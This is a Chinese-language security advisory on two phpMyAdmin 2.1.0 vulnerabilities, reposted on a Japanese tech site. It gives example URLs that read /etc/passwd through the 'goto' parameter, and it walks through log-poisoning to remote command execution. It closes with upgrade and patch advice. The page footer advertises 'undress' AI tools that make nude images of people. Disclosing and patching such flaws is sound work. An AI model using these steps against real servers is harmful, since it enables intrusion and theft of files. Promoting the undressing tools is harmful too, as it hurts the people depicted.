phpMyAdmin2.1.0存在两个漏洞
phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
1664
14
1423
52
1317
25
1268
29
1243
24
phpmyadminで主キーを設定する方法
Apr 07, 2024 pm 02:54 PM
テーブルの主キーは、テーブル内の各レコードを一意に識別する 1 つ以上の列です。主キーを設定する手順は次のとおりです。 phpMyAdmin にログインします。データベースとテーブルを選択します。主キーとして使用する列にチェックを入れます。 「変更を保存」をクリックします。主キーは、データの整合性、検索速度、関係モデリングの利点を提供します。
phpmyadminで外部キーを追加する方法
Apr 07, 2024 pm 02:36 PM
phpMyAdmin に外部キーを追加するには、次の手順に従います。 外部キーを含む親テーブルを選択します。親テーブルの構造を編集し、「列」に新しい列を追加します。外部キー制約を有効にし、参照テーブルとキーを選択します。更新・削除の動作を設定します。変更内容を保存。
phpmyadminでデータテーブルを削除する方法
Apr 07, 2024 pm 03:00 PM
phpMyAdmin でデータ テーブルを削除する手順: データベースとデータ テーブルを選択し、[アクション] タブをクリックし、[削除] オプションを選択し、削除操作を確認して実行します。
WordPress データベースはどこにありますか?
Apr 15, 2024 pm 10:39 PM
WordPress データベースは、すべての Web サイト データを保存する MySQL データベースに格納されており、ホスティング プロバイダーのダッシュボード、FTP、または phpMyAdmin を通じてアクセスできます。データベース名は Web サイトの URL またはユーザー名に関連付けられており、アクセスするには、名前、ユーザー名、パスワード、ホスト名などのデータベース資格情報を使用する必要があります。これらの資格情報は通常「wp-config.php」ファイルに保存されます。
phpmyadmin の脆弱性はどのような脆弱性ですか?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin は、1. SQL インジェクションの脆弱性、2. クロスサイト スクリプティング (XSS) の脆弱性、3. リモート コード実行 (RCE) の脆弱性、4. ローカル ファイル インクルード (LFI) の脆弱性、5. 情報漏えいなどの複数の脆弱性の影響を受けます。脆弱性; 6. 権限昇格の脆弱性。
phpmyadminで外部キーを設定する方法
Apr 07, 2024 pm 03:03 PM
外部キーを設定するにはどうすればよいですか?メインテーブルとサブテーブルを作成します。 phpMyAdmin ダッシュボードを開きます。メインテーブルを選択します。 「構造」タブを開きます。外部キー列を追加し、子テーブルで関連する列を選択します。外部キーのタイプ (「CASCADE」など) を選択します。変更内容を保存。
navicat が接続できない場合はどうすればよいですか?
Apr 23, 2024 am 10:00 AM
Navicat が接続できない場合は、次の解決策を順番に試してください。 データベース名、ホスト名、ポート番号、ユーザー名、パスワードなどの接続情報が正しいかどうかを確認します。データベースが稼働していることを確認してください。ファイアウォール ルールをチェックして、Navicat および関連サービスがブロックされていないことを確認します。 ping コマンドを使用してネットワーク接続をテストしてみてください。 Navicat クライアント ソフトウェアを最新バージョンに更新します。サーバー ログで、失敗した接続に関連するエラー メッセージを確認してください。 Navicat 固有の問題のトラブルシューティングを行うには、他のデータベース ツールを使用して接続を試してください。
phpmyadminを使用してExcelをエクスポートする方法
Apr 07, 2024 pm 02:24 PM
phpMyAdmin 経由でデータを Excel 形式にエクスポートする: phpMyAdmin にログインした後、エクスポートするデータベースとテーブルを選択します。 [エクスポート] オプションをクリックし、[形式] ドロップダウン メニューで [Excel] を選択します。独自のエクスポート列、クエリ オプション、およびその他のエクスポート オプションを選択します。 「ダンプ」ボタンをクリックしてエクスポートを開始し、エクスポートされた Excel ファイルをダウンロードします。
